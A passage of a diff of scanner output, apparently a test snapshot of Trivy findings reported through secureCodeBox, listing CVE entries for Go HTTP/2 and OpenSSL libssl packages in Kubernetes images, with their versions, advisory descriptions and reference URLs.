connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", + ], + }, + "category": "Vulnerability", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "the c_rehash script allows command injection", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://ubuntu.com/security/notices/USN-5488-1", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://ubuntu.com/security/notices/USN-5488-2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.debian.org/security/2022/dsa-5169", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "request smuggling", + "name": "openssl: Read buffer overruns processing ASN.1 strings", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.tenable.com/security/tns-2022-02", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + 